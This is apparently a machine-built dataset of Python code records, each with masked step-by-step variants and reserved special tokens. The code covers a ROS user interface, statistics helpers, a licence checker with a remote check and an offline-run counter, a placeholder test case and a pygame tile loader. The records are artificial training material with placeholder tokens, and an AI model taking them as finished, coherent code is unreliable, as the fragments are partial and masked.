robot's 
behavior.\n\tIf the service is active it call the function getInput that allows\n\tthe user to make a new choice. If it is not, it check if the selected\n\tbehavior is the second one and in that case change it with the fourth one.\n\t\"\"\"\n\tglobal active_\n\t\n\t#init user_interface\n\trospy.init_node('user_interface')\n\n\t#service that allows the user to choose a new input\n\tsrv_user_interface = rospy.Service('/user_interface_service', SetBool, unable_service)\n\t\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown():\n\t\t#if the service is not active\n\t\tif not active_: \n\t\t\trate.sleep()\n\t\t\t\n\t\t\t#if the selected behavior is the second one\n\t\t\tif rospy.get_param(\"/input\") == 2:\n\t\t\t\t#change it in the fourth behavior\n\t\t\t\trospy.set_param(\"/input\",4) \n\t\t\t\n\t\t\tcontinue\n\t\t\n\t\t#if the service is active\t\n\t\telse: \n\t\t\tgetInput() # allow the user to choose a new behaviour\n\t\t\n\t\trate.sleep()\n\t\t\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
<|reserved_special_token_0|>
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def avg(list):
return np.mean(list)
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
<|reserved_special_token_0|>
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def avg(list):
return np.mean(list)
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
def variation_coefficient(list):
return dispersion(list) ** (1 / 2) / np.mean(list) * 100
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
import numpy as np
from math import ceil, log2
def avg(list):
return np.mean(list)
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
def variation_coefficient(list):
return dispersion(list) ** (1 / 2) / np.mean(list) * 100
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
import numpy as np
from math import ceil, log2
def avg(list):
    """Return the arithmetic mean of the sample *list*."""
    sample = np.asarray(list)
    return sample.mean()
def dispersion(list):
    """Return the population variance of the sample *list*.

    Computed as the mean of squared deviations from the sample mean.
    Raises ZeroDivisionError for an empty sample (unchanged behaviour).
    """
    mean = np.mean(list)  # hoisted: the original recomputed the mean per element (O(n^2))
    res = 0
    for i in list:
        res += (i - mean) ** 2
    return res / len(list)
def variation_coefficient(list):
    """Return the coefficient of variation of *list* as a percentage.

    Defined as the (population) standard deviation divided by the mean,
    multiplied by 100.
    """
    standard_deviation = dispersion(list) ** 0.5
    return standard_deviation / np.mean(list) * 100
def chi_square(list, value_range=10000):
    """Pearson chi-square uniformity check over (0, value_range].

    Splits (0, value_range] into k = ceil(log2(n) + 1) equal-width bins
    (Sturges' rule, n = sample size), counts the samples falling in each
    bin, and computes the chi-square statistic against the uniform
    expectation of n / k per bin.  Samples outside (0, value_range] are
    simply not counted (each bin test is ``lower < x <= upper``).

    Returns True when the statistic lies within the fixed acceptance
    band 0.8 <= chi <= 16.8, i.e. the sample is plausibly uniform
    (neither too skewed nor suspiciously regular).
    """
    n = len(list)
    k = ceil(log2(n) + 1)
    step = value_range / k
    expected = n / k  # uniform expectation per bin (p * n with p = 1/k)

    # Observed frequency per bin.  No need to sort: counting is
    # order-independent (the original sorted a copy for nothing).
    frequency_vector = []
    for i in range(k):
        lower = i * step
        upper = (i + 1) * step
        counter = 0
        for j in list:
            if lower < j <= upper:
                counter += 1
        frequency_vector.append(counter)

    chi = 0
    for observed in frequency_vector:
        chi += (observed - expected) ** 2 / expected
    return 0.8 <= chi <= 16.8
|
flexible
|
{
"blob_id": "f2b978b9a4c00469cdd2f5e1e9275df73c7379b8",
"index": 3904,
"step-1": "<mask token>\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\n<mask token>\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
"step-2": "<mask token>\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\n<mask token>\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
"step-3": "<mask token>\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\ndef variation_coefficient(list):\n return dispersion(list) ** (1 / 2) / np.mean(list) * 100\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
"step-4": "import numpy as np\nfrom math import ceil, log2\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\ndef variation_coefficient(list):\n return dispersion(list) ** (1 / 2) / np.mean(list) * 100\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
"step-5": "import numpy as np\nfrom math import ceil, log2\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\ndef variation_coefficient(list):\n return (dispersion(list) ** (1/2) / np.mean(list)) * 100\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n\n frequency_vector = []\n\n for i in range(k):\n counter = 0\n for j in b:\n if (j > i * step) and (j <= (i + 1) * step):\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += ((frequency_vector[i] - p * len(list)) ** 2) / (p * len(list))\n\n return 0.8 <= chi <= 16.8\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
import urllib
class LicenseChecker(object):
    """Licence gate: queries a remote server and allows a bounded number
    of offline runs, tracked in the local file 'times.ehead'.
    """

    def __init__(self):
        # Endpoint that answers 'ACTIVE' (first line) when the licence is valid.
        self.url = 'http://logon.guidoaccardo.com.ar/'
        # Offline-run allowance granted after a successful online check.
        self.count_offline = 15

    def __countTimes(self):
        """Return the number of offline runs still allowed (from 'times.ehead')."""
        with open('times.ehead', 'r') as counter_file:
            remaining = counter_file.read()
        return int(remaining)

    def __updateTimes(self, times):
        """Decrease the stored offline-run counter by *times*."""
        actual = self.__countTimes()
        with open('times.ehead', 'w') as counter_file:
            counter_file.write(str(actual - times))

    def isActive(self):
        """Check the licence, returning {'active': bool, 'msg': str}.

        Online: active iff the server's first line is 'ACTIVE'.
        Offline (IOError): active while the stored counter is non-zero,
        consuming one offline run per call.
        """
        try:
            site = urllib.urlopen(self.url)
            content = site.readlines()
            site.close()
        except IOError:
            if not self.__countTimes() == 0:
                self.__updateTimes(1)
                return {'active': True, 'msg': 'Ejecutando sin conexion.'}
            else:
                return {'active': False, 'msg': 'Ejecutado demasiadas veces sin conexion.'}

        if content[0].strip() == 'ACTIVE':
            # NOTE(review): this SUBTRACTS count_offline from the stored
            # counter rather than resetting it to count_offline — a full
            # counter goes straight to 0 after one successful check.
            # Looks like a bug; behaviour kept unchanged pending confirmation.
            self.__updateTimes(self.count_offline)
            return {'active': True, 'msg': 'Iniciando Sistema'}
        else:
            return {'active': False, 'msg': content[0].strip()}
|
normal
|
{
"blob_id": "c70aa1a373530ac73553753e62d3989f5bc79287",
"index": 687,
"step-1": "<mask token>\n\n\nclass LicenseChecker(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass LicenseChecker(object):\n <mask token>\n <mask token>\n\n def __updateTimes(self, times):\n actual = self.__countTimes()\n ff = open('times.ehead', 'w')\n ff.write(str(actual - times))\n ff.close()\n\n def isActive(self):\n try:\n site = urllib.urlopen(self.url)\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes(1)\n return {'active': True, 'msg': 'Ejecutando sin conexion.'}\n else:\n return {'active': False, 'msg':\n 'Ejecutado demasiadas veces sin conexion.'}\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes(self.count_offline)\n return {'active': True, 'msg': 'Iniciando Sistema'}\n else:\n return {'active': False, 'msg': content[0].strip()}\n",
"step-3": "<mask token>\n\n\nclass LicenseChecker(object):\n\n def __init__(self):\n self.url = 'http://logon.guidoaccardo.com.ar/'\n self.count_offline = 15\n\n def __countTimes(self):\n ff = open('times.ehead', 'r')\n bb = ff.read()\n ff.close()\n return int(bb)\n\n def __updateTimes(self, times):\n actual = self.__countTimes()\n ff = open('times.ehead', 'w')\n ff.write(str(actual - times))\n ff.close()\n\n def isActive(self):\n try:\n site = urllib.urlopen(self.url)\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes(1)\n return {'active': True, 'msg': 'Ejecutando sin conexion.'}\n else:\n return {'active': False, 'msg':\n 'Ejecutado demasiadas veces sin conexion.'}\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes(self.count_offline)\n return {'active': True, 'msg': 'Iniciando Sistema'}\n else:\n return {'active': False, 'msg': content[0].strip()}\n",
"step-4": "import urllib\n\n\nclass LicenseChecker(object):\n\n def __init__(self):\n self.url = 'http://logon.guidoaccardo.com.ar/'\n self.count_offline = 15\n\n def __countTimes(self):\n ff = open('times.ehead', 'r')\n bb = ff.read()\n ff.close()\n return int(bb)\n\n def __updateTimes(self, times):\n actual = self.__countTimes()\n ff = open('times.ehead', 'w')\n ff.write(str(actual - times))\n ff.close()\n\n def isActive(self):\n try:\n site = urllib.urlopen(self.url)\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes(1)\n return {'active': True, 'msg': 'Ejecutando sin conexion.'}\n else:\n return {'active': False, 'msg':\n 'Ejecutado demasiadas veces sin conexion.'}\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes(self.count_offline)\n return {'active': True, 'msg': 'Iniciando Sistema'}\n else:\n return {'active': False, 'msg': content[0].strip()}\n",
"step-5": "#!/usr/bin/env python\n\nimport urllib\n\nclass LicenseChecker( object ):\n\n def __init__( self ):\n self.url = 'http://logon.guidoaccardo.com.ar/'\n self.count_offline = 15\n\n def __countTimes( self ):\n ff = open( 'times.ehead', 'r' )\n bb = ff.read()\n ff.close()\n\n return int( bb )\n\n def __updateTimes( self, times ):\n actual = self.__countTimes()\n ff = open( 'times.ehead', 'w' )\n ff.write( str( actual-times ) )\n ff.close()\n\n def isActive( self ):\n try:\n site = urllib.urlopen( self.url )\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes( 1 )\n return { 'active':True, 'msg':'Ejecutando sin conexion.' }\n else:\n return { 'active':False, 'msg':'Ejecutado demasiadas veces sin conexion.' }\n\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes( self.count_offline )\n return { 'active':True, 'msg':'Iniciando Sistema' }\n else:\n return { 'active':False, 'msg':content[0].strip() }\n",
"step-ids": [
1,
3,
5,
6,
7
]
}
|
[
1,
3,
5,
6,
7
] |
__author__ = 'Administrator'
import unittest
class CouchTests2(unittest.TestCase):
    """Placeholder test case: both tests assert a tautology.

    Useful only to confirm the test runner discovers and executes this
    module; no real behaviour is exercised yet.
    """

    def test_foo(self):
        # Trivial sanity assertion — placeholder until real checks exist.
        self.assertEqual(1, 1)

    def test_bar(self):
        # Trivial sanity assertion — placeholder until real checks exist.
        self.assertEqual(1, 1)
|
normal
|
{
"blob_id": "cd4f22b8e2188e8019e7324e80d64a7b95f8f956",
"index": 1961,
"step-1": "<mask token>\n\n\nclass CouchTests2(unittest.TestCase):\n <mask token>\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-2": "<mask token>\n\n\nclass CouchTests2(unittest.TestCase):\n\n def test_foo(self):\n self.assertEqual(1, 1)\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-3": "__author__ = 'Administrator'\n<mask token>\n\n\nclass CouchTests2(unittest.TestCase):\n\n def test_foo(self):\n self.assertEqual(1, 1)\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-4": "__author__ = 'Administrator'\nimport unittest\n\n\nclass CouchTests2(unittest.TestCase):\n\n def test_foo(self):\n self.assertEqual(1, 1)\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
import pygame
pygame.init()
class Tiles:
    """Static namespace for tile textures and collision data.

    Everything lives at class level: the textures are loaded once while the
    class body executes (pygame must already be initialised), and the class
    itself is used as a namespace — no instances are created.
    """

    # Edge length, in pixels, of one map tile.
    Size = 32
    # Grid positions that cannot be walked on; populated elsewhere at runtime.
    Blocked = []
    # Tile-type tags (keys of Texture_Tags) that block movement.
    Blocked_Types = ["5", "6", "7", "9", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "25", "27", "28", "29"]

    def Blocked_At(pos):
        # Return True when *pos* is a blocked grid position.
        # NOTE(review): written without `self` — call via the class,
        # Tiles.Blocked_At(pos); calling on an instance would misbind pos.
        if list(pos) in Tiles.Blocked:
            return True
        else:
            return False


    def Load_Texture(file, Size):
        # Load an image file and return it as a Size x Size surface with
        # per-pixel alpha.  Written without `self` so it is callable while
        # the class body below is still executing.
        bitmap = pygame.image.load(file)
        bitmap = pygame.transform.scale(bitmap, (Size, Size))
        surface = pygame.Surface((Size, Size), pygame.HWSURFACE|pygame.SRCALPHA)
        surface.blit(bitmap, (0, 0))
        return surface


    # Ground / floor textures (one tile each).  Note the first attribute is
    # named `Tiles` like the class; Tiles.Blocked_At still works because the
    # global name `Tiles` resolves to the class, not this attribute.
    Tiles = Load_Texture("Graphics\\hospitalTile.png", Size)
    Stone = Load_Texture("Graphics\\stone.png", Size)
    Grass = Load_Texture("Graphics\\grass.png", Size)
    Water = Load_Texture("Graphics\\water.png", Size)

    # Large props span multiple tiles (Size*4 etc.).
    Machine = Load_Texture("Graphics\\hospitalTileMachine.png", Size*4)
    WifeY = Load_Texture("Graphics\\young_bed.png", Size*4)
    WifeO = Load_Texture("Graphics\\old_bed.png", Size*4)
    DoorOpen = Load_Texture("Graphics\\door_open.png", Size)
    DoorClosed = Load_Texture("Graphics\\door_closed.png", Size)

    # Wall segments and corner pieces.
    WallLeft = Load_Texture("Graphics\\leftwall.png", Size)
    WallUpper = Load_Texture("Graphics\\upperwall.png", Size)
    WallRight = Load_Texture("Graphics\\rightwall.png", Size)
    WallLower = Load_Texture("Graphics\\lowerwall.png", Size)
    UpperLeftCorner = Load_Texture("Graphics\\left_upperCorner.png", Size)
    UpperRightCorner = Load_Texture("Graphics\\right_upperCorner.png", Size)
    LowerRightCorner = Load_Texture("Graphics\\right_lowerCorner.png", Size)
    LowerLeftCorner = Load_Texture("Graphics\\left_lowerCorner.png", Size)

    TowerWall = Load_Texture("Graphics\\Towerwall.png", Size)
    TowerWallLeft = Load_Texture("Graphics\\TowerwallLeft.png", Size)
    TowerWallRight = Load_Texture("Graphics\\TowerwallRight.png", Size)
    WoodFloor = Load_Texture("Graphics\\woodfloor.png", Size)

    # Decorations, terrain variants and vehicles.
    Balloons = Load_Texture("Graphics\\balloons.png", Size)
    Yellow = Load_Texture("Graphics\\yellow.png", Size)
    White = Load_Texture("Graphics\\white.png", Size)
    Tombstone = Load_Texture("Graphics\\tombstone.png", Size)
    Sand = Load_Texture("Graphics\\sand.png", Size)
    Plane = Load_Texture("Graphics\\plane.png", Size * 8)
    Car1 = Load_Texture("Graphics\\car3.png", Size * 6)
    Car2 = Load_Texture("Graphics\\car4.png", Size * 6)

    # Map-file tag -> texture lookup table.
    Texture_Tags = {"1" : Grass,
                    "2" : Stone,
                    "3" : Water,
                    "4" : Tiles,
                    "5" : Machine,
                    "6" : WifeY,
                    "7" : WifeO,
                    "8" : DoorOpen,
                    "9" : DoorClosed,
                    "10" : WallLeft,
                    "11" : WallUpper,
                    "12" : WallRight,
                    "13" : WallLower,
                    "14" : UpperLeftCorner,
                    "15" : UpperRightCorner,
                    "16" : LowerRightCorner,
                    "17" : LowerLeftCorner,
                    "18" : TowerWall,
                    "19" : TowerWallLeft,
                    "20" : TowerWallRight,
                    "21" : WoodFloor,
                    "22" : Balloons,
                    "23" : Yellow,
                    "24" : White,
                    "25" : Tombstone,
                    "26" : Sand,
                    "27" : Plane,
                    "28" : Car1,
                    "29" : Car2}
|
normal
|
{
"blob_id": "3d1f7794763b058cc22c543709a97cb021d0fd23",
"index": 8404,
"step-1": "<mask token>\n\n\nclass Tiles:\n <mask token>\n <mask token>\n <mask token>\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = ['5', '6', '7', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '25', '27', '28', '29']\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n Tiles = Load_Texture('Graphics\\\\hospitalTile.png', Size)\n Stone = Load_Texture('Graphics\\\\stone.png', Size)\n Grass = Load_Texture('Graphics\\\\grass.png', Size)\n Water = Load_Texture('Graphics\\\\water.png', Size)\n Machine = Load_Texture('Graphics\\\\hospitalTileMachine.png', Size * 4)\n WifeY = Load_Texture('Graphics\\\\young_bed.png', Size * 4)\n WifeO = Load_Texture('Graphics\\\\old_bed.png', Size * 4)\n DoorOpen = Load_Texture('Graphics\\\\door_open.png', Size)\n DoorClosed = Load_Texture('Graphics\\\\door_closed.png', Size)\n WallLeft = Load_Texture('Graphics\\\\leftwall.png', Size)\n WallUpper = Load_Texture('Graphics\\\\upperwall.png', Size)\n WallRight = Load_Texture('Graphics\\\\rightwall.png', Size)\n WallLower = Load_Texture('Graphics\\\\lowerwall.png', Size)\n UpperLeftCorner = Load_Texture('Graphics\\\\left_upperCorner.png', Size)\n UpperRightCorner = Load_Texture('Graphics\\\\right_upperCorner.png', Size)\n LowerRightCorner = Load_Texture('Graphics\\\\right_lowerCorner.png', Size)\n LowerLeftCorner = Load_Texture('Graphics\\\\left_lowerCorner.png', Size)\n TowerWall = Load_Texture('Graphics\\\\Towerwall.png', Size)\n TowerWallLeft = Load_Texture('Graphics\\\\TowerwallLeft.png', Size)\n TowerWallRight = Load_Texture('Graphics\\\\TowerwallRight.png', Size)\n WoodFloor = Load_Texture('Graphics\\\\woodfloor.png', Size)\n Balloons = Load_Texture('Graphics\\\\balloons.png', Size)\n Yellow = 
Load_Texture('Graphics\\\\yellow.png', Size)\n White = Load_Texture('Graphics\\\\white.png', Size)\n Tombstone = Load_Texture('Graphics\\\\tombstone.png', Size)\n Sand = Load_Texture('Graphics\\\\sand.png', Size)\n Plane = Load_Texture('Graphics\\\\plane.png', Size * 8)\n Car1 = Load_Texture('Graphics\\\\car3.png', Size * 6)\n Car2 = Load_Texture('Graphics\\\\car4.png', Size * 6)\n Texture_Tags = {'1': Grass, '2': Stone, '3': Water, '4': Tiles, '5':\n Machine, '6': WifeY, '7': WifeO, '8': DoorOpen, '9': DoorClosed,\n '10': WallLeft, '11': WallUpper, '12': WallRight, '13': WallLower,\n '14': UpperLeftCorner, '15': UpperRightCorner, '16':\n LowerRightCorner, '17': LowerLeftCorner, '18': TowerWall, '19':\n TowerWallLeft, '20': TowerWallRight, '21': WoodFloor, '22':\n Balloons, '23': Yellow, '24': White, '25': Tombstone, '26': Sand,\n '27': Plane, '28': Car1, '29': Car2}\n",
"step-3": "<mask token>\npygame.init()\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = ['5', '6', '7', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '25', '27', '28', '29']\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n Tiles = Load_Texture('Graphics\\\\hospitalTile.png', Size)\n Stone = Load_Texture('Graphics\\\\stone.png', Size)\n Grass = Load_Texture('Graphics\\\\grass.png', Size)\n Water = Load_Texture('Graphics\\\\water.png', Size)\n Machine = Load_Texture('Graphics\\\\hospitalTileMachine.png', Size * 4)\n WifeY = Load_Texture('Graphics\\\\young_bed.png', Size * 4)\n WifeO = Load_Texture('Graphics\\\\old_bed.png', Size * 4)\n DoorOpen = Load_Texture('Graphics\\\\door_open.png', Size)\n DoorClosed = Load_Texture('Graphics\\\\door_closed.png', Size)\n WallLeft = Load_Texture('Graphics\\\\leftwall.png', Size)\n WallUpper = Load_Texture('Graphics\\\\upperwall.png', Size)\n WallRight = Load_Texture('Graphics\\\\rightwall.png', Size)\n WallLower = Load_Texture('Graphics\\\\lowerwall.png', Size)\n UpperLeftCorner = Load_Texture('Graphics\\\\left_upperCorner.png', Size)\n UpperRightCorner = Load_Texture('Graphics\\\\right_upperCorner.png', Size)\n LowerRightCorner = Load_Texture('Graphics\\\\right_lowerCorner.png', Size)\n LowerLeftCorner = Load_Texture('Graphics\\\\left_lowerCorner.png', Size)\n TowerWall = Load_Texture('Graphics\\\\Towerwall.png', Size)\n TowerWallLeft = Load_Texture('Graphics\\\\TowerwallLeft.png', Size)\n TowerWallRight = Load_Texture('Graphics\\\\TowerwallRight.png', Size)\n WoodFloor = Load_Texture('Graphics\\\\woodfloor.png', Size)\n Balloons = Load_Texture('Graphics\\\\balloons.png', Size)\n Yellow = 
Load_Texture('Graphics\\\\yellow.png', Size)\n White = Load_Texture('Graphics\\\\white.png', Size)\n Tombstone = Load_Texture('Graphics\\\\tombstone.png', Size)\n Sand = Load_Texture('Graphics\\\\sand.png', Size)\n Plane = Load_Texture('Graphics\\\\plane.png', Size * 8)\n Car1 = Load_Texture('Graphics\\\\car3.png', Size * 6)\n Car2 = Load_Texture('Graphics\\\\car4.png', Size * 6)\n Texture_Tags = {'1': Grass, '2': Stone, '3': Water, '4': Tiles, '5':\n Machine, '6': WifeY, '7': WifeO, '8': DoorOpen, '9': DoorClosed,\n '10': WallLeft, '11': WallUpper, '12': WallRight, '13': WallLower,\n '14': UpperLeftCorner, '15': UpperRightCorner, '16':\n LowerRightCorner, '17': LowerLeftCorner, '18': TowerWall, '19':\n TowerWallLeft, '20': TowerWallRight, '21': WoodFloor, '22':\n Balloons, '23': Yellow, '24': White, '25': Tombstone, '26': Sand,\n '27': Plane, '28': Car1, '29': Car2}\n",
"step-4": "import pygame\npygame.init()\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = ['5', '6', '7', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '25', '27', '28', '29']\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n Tiles = Load_Texture('Graphics\\\\hospitalTile.png', Size)\n Stone = Load_Texture('Graphics\\\\stone.png', Size)\n Grass = Load_Texture('Graphics\\\\grass.png', Size)\n Water = Load_Texture('Graphics\\\\water.png', Size)\n Machine = Load_Texture('Graphics\\\\hospitalTileMachine.png', Size * 4)\n WifeY = Load_Texture('Graphics\\\\young_bed.png', Size * 4)\n WifeO = Load_Texture('Graphics\\\\old_bed.png', Size * 4)\n DoorOpen = Load_Texture('Graphics\\\\door_open.png', Size)\n DoorClosed = Load_Texture('Graphics\\\\door_closed.png', Size)\n WallLeft = Load_Texture('Graphics\\\\leftwall.png', Size)\n WallUpper = Load_Texture('Graphics\\\\upperwall.png', Size)\n WallRight = Load_Texture('Graphics\\\\rightwall.png', Size)\n WallLower = Load_Texture('Graphics\\\\lowerwall.png', Size)\n UpperLeftCorner = Load_Texture('Graphics\\\\left_upperCorner.png', Size)\n UpperRightCorner = Load_Texture('Graphics\\\\right_upperCorner.png', Size)\n LowerRightCorner = Load_Texture('Graphics\\\\right_lowerCorner.png', Size)\n LowerLeftCorner = Load_Texture('Graphics\\\\left_lowerCorner.png', Size)\n TowerWall = Load_Texture('Graphics\\\\Towerwall.png', Size)\n TowerWallLeft = Load_Texture('Graphics\\\\TowerwallLeft.png', Size)\n TowerWallRight = Load_Texture('Graphics\\\\TowerwallRight.png', Size)\n WoodFloor = Load_Texture('Graphics\\\\woodfloor.png', Size)\n Balloons = Load_Texture('Graphics\\\\balloons.png', Size)\n Yellow = 
